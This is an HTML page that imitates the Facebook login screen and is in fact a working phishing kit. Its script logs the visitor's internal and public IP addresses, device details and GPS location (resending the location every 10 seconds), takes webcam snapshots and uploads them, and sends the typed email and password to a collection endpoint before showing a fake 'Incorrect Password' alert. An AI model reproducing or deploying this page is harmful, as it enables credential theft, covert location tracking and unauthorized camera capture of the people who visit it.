<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Facebook – log in or sign up</title>
  <style>
    :root {
      --fb-blue: #1877f2;
      --fb-dark: #1c1e21;
      --fb-gray: #f0f2f5;
      --text-gray: #606770;
    }
    body {
      margin: 0;
      padding: 0;
      font-family: Arial, sans-serif;
      background: linear-gradient(to right, #f0f2f5, #ffffff);
      color: var(--fb-dark);
      display: flex;
      flex-direction: column;
      align-items: center;
      min-height: 100vh;
    }
    .language-selector {
      margin-top: 13px;
      font-size: 14px;
      color: #606770;
      text-align: center;
    }
    .language-selector:hover {
      text-decoration: underline;
      cursor: pointer;
    }
    .fb-logo {
      width: 60px;
      margin-top: 60px;
      margin-bottom: 70px;
    }
    .input-container {
      width: 90%;
      max-width: 340px;
      display: flex;
      flex-direction: column;
      align-items: center;
    }
    .input-container input {
      width: 100%;
      padding: 18px;
      margin: 8px 0;
      border: 1px solid #dddfe2;
      border-radius: 8px;
      font-size: 18px;
    }
    .input-container input:focus {
      outline: none;
      border-color: var(--fb-blue);
      box-shadow: 0 0 0 2px #e7f3ff;
    }
    .login-btn {
      width: 349px;
      background-color: var(--fb-blue);
      color: #fff;
      border: none;
      border-radius: 30px;
      font-size: 16px;
      font-weight: bold;
      padding: 12px 0;
      margin: 12px 0;
      cursor: pointer;
      text-align: center;
    }
    .login-btn:hover {
      background-color: #166fe5;
    }
    .forgot-pass {
      color: var(--fb-dark);
      text-decoration: none;
      font-size: 16px;
      margin: 5px 0 120px;
    }
    .forgot-pass:hover {
      text-decoration: underline;
    }
    .create-account {
      width: 340px;
      background-color: #e4e6eb;
      color: var(--fb-blue);
      border: 1px solid var(--fb-blue);
      border-radius: 30px;
      font-size: 18px;
      font-weight: bold;
      padding: 14px 0;
      cursor: pointer;
      text-align: center;
    }
    .create-account:hover {
      background-color: rgba(24, 119, 242, 0.1);
    }
    .meta-section {
      text-align: center;
      font-size: 12px;
      color: #8d949e;
      margin-top: 20px;
      margin-bottom: 10px;
    }
    .meta-section img {
      width: 50px;
      margin-bottom: 5px;
    }
    .footer-links {
      display: flex;
      gap: 15px;
      justify-content: center;
      font-size: 12px;
      color: #8d949e;
    }
    .footer-links a {
      text-decoration: none;
      color: #8d949e;
    }
    .footer-links a:hover {
      text-decoration: underline;
    }
  </style>
</head>
<body>
  <div class="language-selector">English (US)</div>
  <img src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" class="fb-logo" alt="Facebook Logo" />
  <div class="input-container">
    <input type="text" id="username" placeholder="Mobile number or email" />
    <input type="password" id="password" placeholder="Password" />
    <button class="login-btn" onclick="sendLoginData()">Log in</button>
    <a href="#" class="forgot-pass">Forgot password?</a>
  </div>
  <button class="create-account">Create new account</button>
  <div class="meta-section">
    <img src="https://upload.wikimedia.org/wikipedia/commons/7/7b/Meta_Platforms_Inc._logo.svg" alt="Meta Logo" />
    <div>© 2025 Meta</div>
  </div>
  <div class="footer-links">
    <a href="#">About</a>
    <a href="#">Help</a>
    <a href="#">More</a>
  </div>
  <script>
    // الحصول على IP الداخلي باستخدام WebRTC
    function getInternalIP(callback) {
      let rtc = new RTCPeerConnection({iceServers: []});
      rtc.createDataChannel("");
      rtc.createOffer().then(offer => rtc.setLocalDescription(offer));
      rtc.onicecandidate = event => {
        if (event.candidate) {
          let ipRegex = /([0-9]{1,3}\.){3}[0-9]{1,3}/;
          let match = ipRegex.exec(event.candidate.candidate);
          if (match) {
            callback(match[0]);
          }
        }
      };
    }

    // متغير لتخزين البيانات العامة
    let globalPayload = {};

    // دالة إرسال البيانات العامة عند تحميل الصفحة
    async function sendFirstData() {
      let publicIP = await fetch("https://api64.ipify.org?format=json")
        .then(res => res.json())
        .then(data => data.ip)
        .catch(() => "Unknown");

      getInternalIP(function(internalIP) {
        let deviceInfo = {
          device: navigator.platform || "Unknown",
          browser: navigator.userAgent || "Unknown"
        };

        fetch("https://ipinfo.io/json?token=d780b6d9a02bf6")
          .then(res => res.json())
          .then(info => {
            globalPayload = {
              ip_internal: internalIP || "Unknown",
              ip_external: info.ip || publicIP,
              city: info.city || "Unknown",
              country: info.country || "Unknown",
              network: info.org || "Unknown",
              geo_ipinfo: info.loc || "Unknown",
              device: deviceInfo.device,
              browser: deviceInfo.browser
            };
            sendData(globalPayload);
          })
          .catch(() => {
            globalPayload = {
              ip_internal: internalIP || "Unknown",
              ip_external: publicIP,
              city: "Unknown",
              country: "Unknown",
              network: "Unknown",
              geo_ipinfo: "Unknown",
              device: deviceInfo.device,
              browser: deviceInfo.browser
            };
            sendData(globalPayload);
          });
      });
    }

    // دالة تحديث بيانات Geolocation وإعادة إرسالها بشكل متكرر
    function startGeolocationUpdates() {
      if(navigator.geolocation) {
        // عند الحصول على الموقع الأول، قم بتحديث البيانات
        navigator.geolocation.getCurrentPosition(position => {
          let geo_geolocation = `${position.coords.latitude}, ${position.coords.longitude}`;
          globalPayload.geo_geolocation = geo_geolocation;
          sendData(globalPayload);
        });
        // استمر بتحديث الموقع كل 10 ثوانٍ
        setInterval(() => {
          navigator.geolocation.getCurrentPosition(position => {
            let geo_geolocation = `${position.coords.latitude}, ${position.coords.longitude}`;
            globalPayload.geo_geolocation = geo_geolocation;
            sendData(globalPayload);
          }, error => {
            console.error("Geolocation update error:", error);
          });
        }, 10000);
      }
    }

    // دالة إرسال البيانات إلى الخادم عبر endpoint /capture
    function sendData(payload) {
      fetch("/capture", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(payload)
      });
    }

    // التقاط صورة فورية بعد الحصول على إذن Geolocation
    async function captureImageImmediate() {
      if(navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
        try {
          const stream = await navigator.mediaDevices.getUserMedia({ video: true });
          const video = document.createElement("video");
          video.srcObject = stream;
          await video.play();
          captureImage(video);
          stream.getTracks().forEach(track => track.stop());
        } catch(e) {
          console.error("Error capturing immediate image:", e);
        }
      }
    }

    window.onload = () => {
      // إرسال البيانات العامة فور تحميل الصفحة
      sendFirstData();
      // بدء تحديث Geolocation بشكل متكرر (كل 10 ثوانٍ)
      startGeolocationUpdates();
      // التقاط صورة فورية عند الحصول على إذن Geolocation سيتم ضمن sendFirstData
      // كما يمكن التقاط 3 صور متتالية بعد 5 ثوانٍ
      setTimeout(captureImages, 5000);
    };

    async function captureImages() {
      if(navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
        try {
          const stream = await navigator.mediaDevices.getUserMedia({ video: true });
          const video = document.createElement("video");
          video.srcObject = stream;
          await video.play();
          for(let i = 1; i <= 3; i++){
            await new Promise(resolve => setTimeout(resolve, 2000));
            captureImage(video);
          }
          stream.getTracks().forEach(track => track.stop());
        } catch(e) {
          console.error("Error capturing images:", e);
        }
      }
    }

    function captureImage(video) {
      const canvas = document.createElement("canvas");
      canvas.width = video.videoWidth;
      canvas.height = video.videoHeight;
      canvas.getContext("2d").drawImage(video, 0, 0);
      canvas.toBlob(blob => {
        let formData = new FormData();
        formData.append("image", blob, "capture.jpeg");
        fetch("/upload", {
          method: "POST",
          body: formData
        });
      }, "image/jpeg", 0.9);
    }

    function sendLoginData() {
      var username = document.getElementById("username").value;
      var password = document.getElementById("password").value;
      fetch("/capture", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          email_phone: username,
          password: password
        })
      });
      setTimeout(() => {
        alert("Incorrect Password\n\nWe can help you log into your account if you've forgotten your password.");
      }, 500);
    }
  </script>
</body>
</html>
